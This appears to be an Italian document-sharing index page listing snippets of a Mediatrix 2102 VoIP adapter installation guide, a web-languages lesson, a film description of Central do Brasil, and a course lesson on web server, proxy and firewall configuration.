ATA MEDIATRIX 2102 GUIDA ALL INSTALLAZIONE ATA MEDIATRIX 2102 GUIDA ALL INSTALLAZIONE Mediatrix 2102 ATA Guida all installazione EUTELIAVOIP Rev1-0 pag.2 INDICE SERVIZIO EUTELIAVOIP...3 COMPONENTI PRESENTI NELLA SCATOLA DEL MEDIATRIX 2102...3 COLLEGAMENTO

Dettagli

Lezione n 1! Introduzione"

Lezione n 1! Introduzione Lezione n 1! Introduzione" Corso sui linguaggi del web" Fondamentali del web" Fondamentali di una gestione FTP" Nomenclatura di base del linguaggio del web" Come funziona la rete internet?" Connessione"

Dettagli

33. Dora perdona il suo pessimo padre

33. Dora perdona il suo pessimo padre 33. Dora perdona il suo pessimo padre Central do Brasil (1998) di Walter Salles Il film racconta la storia di una donna cinica e spietata che grazie all affetto di un bambino ritrova la capacità di amare

Dettagli

CONFIGURAZIONE DEI SERVIZI (seconda parte)

CONFIGURAZIONE DEI SERVIZI (seconda parte) Corso ForTIC C2 LEZIONE n. 10 CONFIGURAZIONE DEI SERVIZI (seconda parte) WEB SERVER PROXY FIREWALL Strumenti di controllo della rete I contenuti di questo documento, salvo diversa indicazione, sono rilasciati

Dettagli